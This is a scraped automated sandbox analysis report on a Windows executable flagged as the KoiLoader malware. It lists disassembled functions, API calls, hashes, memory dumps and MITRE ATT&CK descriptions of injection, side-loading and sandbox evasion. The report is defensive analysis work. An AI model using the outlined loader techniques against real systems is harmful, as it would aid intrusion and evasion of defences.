
API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ecdf72b0be281b1db8f2cf626c8a9dae85f759fe038910fa3cb3a216cdca0410
Instruction ID: d746644d9ab9f194237e549faa8f4c9928bd2f415b05a05e21a5b6cb5b960e65
Opcode Fuzzy Hash: ecdf72b0be281b1db8f2cf626c8a9dae85f759fe038910fa3cb3a216cdca0410
Instruction Fuzzy Hash: DD51D0B2601A26EFDF2A8F54F845BAAB7A4FF45310F24412DED0157291E739EC41CB90

Function 0079832A Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0079C440,?,00000001,0079AD76,?,0079C8FA,00000001,?,?,?,0079AD05,?,?), ref: 0079832F
_free.LIBCMT ref: 0079838C
_free.LIBCMT ref: 007983C2
SetLastError.KERNEL32(00000000,00000005,000000FF,?,0079C8FA,00000001,?,?,?,0079AD05,?,?,?,007A7520,0000002C,0079AD76), ref: 007983CD

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 76576bfc3cfa42a753f6ee7812d76e13f89949eb758ab60f9e21df26872a0934
Instruction ID: 1f08aea7b7147ef0c1eca1bfc36958d91b4147bd6f76d5d1d111669aed8e1c57
Opcode Fuzzy Hash: 76576bfc3cfa42a753f6ee7812d76e13f89949eb758ab60f9e21df26872a0934
Instruction Fuzzy Hash: 2111E572614201BBDF952778BC89E2F376A9BC3B74B284B25F624921D2DD2D8C098177

Function 00798481 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,007911AD,?,00798822,007985BF,?,?,007911AD,?), ref: 00798486
_free.LIBCMT ref: 007984E3
_free.LIBCMT ref: 00798519
SetLastError.KERNEL32(00000000,00000005,000000FF,?,007911AD,?,00798822,007985BF,?,?,007911AD,?), ref: 00798524

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 5b5deec7df3d9c7e1d2942dd7bdfde84e7e2a02c8394c92559d3514209c827bd
Instruction ID: 2480a25fefc06ab95f4b5a18709103a555ad466f4cba467dc41b70186a9b753f
Opcode Fuzzy Hash: 5b5deec7df3d9c7e1d2942dd7bdfde84e7e2a02c8394c92559d3514209c827bd
Instruction Fuzzy Hash: 68110872604141BEDF916B78BC89E2F27699FC33747258729F524D61E2DE2C8C098173

Function 0079D4D6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001), ref: 0079D4ED
GetLastError.KERNEL32(?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001,?,00000001,?,0079C91B,0079AD05), ref: 0079D4F9

Part of subcall function 0079D4BF: CloseHandle.KERNEL32(FFFFFFFE,0079D509,?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001,?,00000001), ref: 0079D4CF

___initconout.LIBCMT ref: 0079D509

Part of subcall function 0079D481: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0079D4B0,0079CF22,00000001,?,0079C3CF,?,?,00000001,?), ref: 0079D494

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0079CF35,?,00000001,?,00000001,?,0079C3CF,?,?,00000001,?), ref: 0079D51E

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 068529891c0f5f81565eaa0246efa5df837382f9edc60765991220433ba614bc
Instruction ID: 374021bbe808fbcabfb606b405a2b15cd47f1b0f147f43effe1e9bb3fe3ced23
Opcode Fuzzy Hash: 068529891c0f5f81565eaa0246efa5df837382f9edc60765991220433ba614bc
Instruction Fuzzy Hash: D3F0C036911168BBCF722FD5EC08A9A3F66FB493E1F458010FE1895130DA3ADC60DB95

Function 00797C6B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00797C74

Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA

_free.LIBCMT ref: 00797C87
_free.LIBCMT ref: 00797C98
_free.LIBCMT ref: 00797CA9

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fdc85b9a568766b8fb38026f05f4bcbe58e343ab019dd243702cf76823ff8e7f
Instruction ID: 30223f3fb5d90fd7f98d6c922797abcbda74222741f6d18c06c6bd2ac5da4304
Opcode Fuzzy Hash: fdc85b9a568766b8fb38026f05f4bcbe58e343ab019dd243702cf76823ff8e7f
Instruction Fuzzy Hash: 2CE0BF715281A9EA8F166F28FC4D4867B26E7CA710742C046FA4526331C63D45B3DFA9

Function 00795780 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007957A5

Strings

MOC, xrefs: 007957B7
RCC, xrefs: 007957BF

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 936637a109ce541cdb19bcd0e7c429392b9abdc5d4a61c2c291a8e01d3c000c7
Instruction ID: ba11ceab3c7ceae02303d784efcacb13b65606f0bf121493da812d9066076188
Opcode Fuzzy Hash: 936637a109ce541cdb19bcd0e7c429392b9abdc5d4a61c2c291a8e01d3c000c7
Instruction Fuzzy Hash: 55417971900619EFCF16DFA8E885EAEBBB5BF48304F188059F905A7221D339A951CB50

Function 00791110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 0079111B
GetModuleHandleW.KERNEL32(00000000), ref: 00791162

Strings

kernel32, xrefs: 00791116

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: HandleModule
String ID: kernel32
API String ID: 4139908857-541877477
Opcode ID: da70534b0f6b5cf8ce231f57337e5375e72ea6eb1fa1e0ad0098f6dd776c11b7
Instruction ID: e0ca0ff76db1c29c90c2ba62791303c64b88f9dd7b9d0b7ea99c9115e7bb9b26
Opcode Fuzzy Hash: da70534b0f6b5cf8ce231f57337e5375e72ea6eb1fa1e0ad0098f6dd776c11b7
Instruction Fuzzy Hash: 5321F5B9E4020DEBCF04DFE4D849AEEBBB4AF48304F508558E905A7244E7399A50CFA1

Function 00793680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_Max_value.LIBCPMTD ref: 007936B6
_Min_value.LIBCPMTD ref: 007936DC

Strings

[4y, xrefs: 007936E6

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: Max_valueMin_value
String ID: [4y
API String ID: 3846992165-224076332
Opcode ID: b23dc5a212cdaf110c71246c1bb5c47703ea5d9cf8a58707570367144485a173
Instruction ID: 1e2d544bc165fd9e903036f3cbf243c3495992c7c6ad520f1a5b74aa3ee70365
Opcode Fuzzy Hash: b23dc5a212cdaf110c71246c1bb5c47703ea5d9cf8a58707570367144485a173
Instruction Fuzzy Hash: 5D01ECB5D1020DDFCF04EFA4E8469EEBBB4AF48300F508569E516A7311EA38A704DB91

Function 00792A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

task.LIBCPMTD ref: 00792AB3
task.LIBCPMTD ref: 00792AC2

Strings

dboupzalsfzwvwpyqdpu, xrefs: 00792A96

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traits
String ID: dboupzalsfzwvwpyqdpu
API String ID: 1455298312-2047172133
Opcode ID: 54487e678644643331035d5d182fb9f58aba05d4128db7f695330a94bb7acfdb
Instruction ID: 28944ec50ee79c674b473853a114734edd3927cb2e504cb125e97439403d68d4
Opcode Fuzzy Hash: 54487e678644643331035d5d182fb9f58aba05d4128db7f695330a94bb7acfdb
Instruction Fuzzy Hash: 5E018CB1904648EBCB00DF58D845BAEBBB4FB05720F008769F821A73C0DB796B14CB80

Function 007929F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

task.LIBCPMTD ref: 00792A43

Strings

S, xrefs: 00792A24
oeislvoodubcwjonjrwnhbjfxmsna, xrefs: 00792A07

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: char_traitstask
String ID: S$oeislvoodubcwjonjrwnhbjfxmsna
API String ID: 3039116899-104439280
Opcode ID: eeb49413d5b80acb7f6109638a6da4bf2ee65f0d03a75c43ee0fcee26ad92829
Instruction ID: 3ec7a14702aec7d9ed72ce2d546e99400af75f34cae0b715be42a2722a42a105
Opcode Fuzzy Hash: eeb49413d5b80acb7f6109638a6da4bf2ee65f0d03a75c43ee0fcee26ad92829
Instruction Fuzzy Hash: 82F06D71D04208DBDF18EFA8E5597FEB7B0EB08304F108069D80277282EA7D9E09DB59

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DWbCUTdGhV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: KoiLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: DWbCUTdGhV.exePID: 2132, Parent PID: 4004

Windows Analysis Report
DWbCUTdGhV.exe

Function 011F8620 Relevance: 196.6, APIs: 73, Strings: 39, Instructions: 584
libraryloaderCOMMON

Function 00791300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Function 00792F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
timeCOMMON

Function 011F8DD0 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Function 00791710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Function 011F6BC0 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Function 011F5E70 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Function 011F5AF0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 285
injectionthreadprocessCOMMON

Function 011F7650 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174
memoryCOMMON

Function 011F7860 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 434
memorystringCOMMON

Function 011F7D50 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Function 011F66A0 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Function 00792AE0 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 276
COMMON

Function 007921A0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
COMMON